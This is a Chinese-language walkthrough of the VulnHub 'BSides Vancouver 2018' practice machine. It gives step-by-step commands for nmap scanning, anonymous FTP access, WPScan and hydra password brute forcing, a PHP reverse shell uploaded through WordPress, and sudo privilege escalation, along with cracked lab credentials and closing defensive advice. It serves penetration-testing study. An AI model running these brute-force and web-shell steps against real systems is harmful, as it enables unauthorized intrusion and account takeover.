VulnHub-BSides Vancouver: 2018 (Workshop)-靶机渗透学习
字数 1243 2025-08-15 21:33:30
BSides Vancouver 2018 Workshop 靶机渗透教学文档
靶机概述
- 靶机名称: BSides Vancouver: 2018 (Workshop)
- 难度等级: 中级(CTF)
- 发布日期: 2018年3月21日
- 目标: 获取root权限并找到flag.txt
- 环境要求:
- 能够运行两个虚拟机
- 至少20GB可用空间
- 预装VirtualBox
- Kali Linux虚拟机
- 熟悉命令行界面(CLI)
渗透测试步骤详解
1. 信息收集
1.1 网络扫描
使用nmap进行初始扫描,发现开放端口:
nmap -sV -T4 <靶机IP>
发现开放服务:
- 21/tcp - FTP (允许匿名登录)
- 22/tcp - SSH
- 80/tcp - HTTP
1.2 FTP服务探查
匿名登录FTP服务:
ftp <靶机IP>
用户名: anonymous
密码: (任意或留空)
下载关键文件:
get users.txt.bk
users.txt.bk内容为潜在用户名列表,可用于后续爆破。
2. Web服务分析
2.1 HTTP服务枚举
访问80端口web服务,检查robots.txt文件:
http://<靶机IP>/robots.txt
发现敏感目录:
/backup_wordpress/
2.2 目录爆破
使用gobuster进行目录枚举:
gobuster dir -u http://<靶机IP>/backup_wordpress/ -t30 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,301,302
发现关键目录:
/wp-admin/(WordPress管理后台)/wp-content/uploads/(上传目录)
3. WordPress漏洞利用
3.1 用户枚举
使用WPScan枚举WordPress用户:
wpscan --url http://<靶机IP>/backup_wordpress/ --enumerate u
3.2 密码爆破
使用WPScan进行密码爆破:
wpscan --url http://<靶机IP>/backup_wordpress/ --api-token 'API' -U wordpressusers.txt -P /usr/share/wordlists/rockyou.txt
成功获取凭据:
- 用户名: john
- 密码: enigma
3.3 获取Web Shell
- 登录WordPress后台
- 通过媒体上传功能上传PHP反弹shell文件
- 访问上传的shell文件路径获取反向连接
4. 权限提升
4.1 初始访问
在Kali上设置监听:
nc -lvnp 1234
访问上传的PHP shell触发反向连接。
4.2 用户枚举
检查系统用户:
ls /home
发现多个用户,其中anne用户可被利用。
4.3 SSH密码爆破
使用hydra爆破SSH密码:
hydra -l anne -P /usr/share/wordlists/rockyou.txt -t 4 ssh://<靶机IP>
成功获取凭据:
- 用户名: anne
- 密码: princess
4.4 特权提升
通过SSH登录后检查sudo权限:
sudo -l
发现anne用户具有完整sudo权限,直接提权:
sudo su
关键工具与技术总结
- nmap: 网络扫描和端口服务识别
- FTP匿名登录: 获取初始信息
- gobuster: Web目录爆破
- WPScan: WordPress漏洞扫描和用户枚举
- hydra: SSH密码爆破
- sudo权限滥用: 最终特权提升
防御建议
- 禁用FTP匿名登录
- 加强WordPress安全措施:
- 使用强密码
- 限制登录尝试
- 及时更新插件和主题
- 限制sudo权限
- 监控文件上传功能
- 实施SSH安全措施:
- 禁用密码认证,使用密钥
- 限制登录尝试
- 使用fail2ban
扩展思考
该靶机可能存在其他攻击路径:
- WordPress插件漏洞利用
- 内核漏洞提权
- 服务配置错误利用
- 数据库凭证泄露
建议尝试多种方法获取root权限,以全面理解系统脆弱性。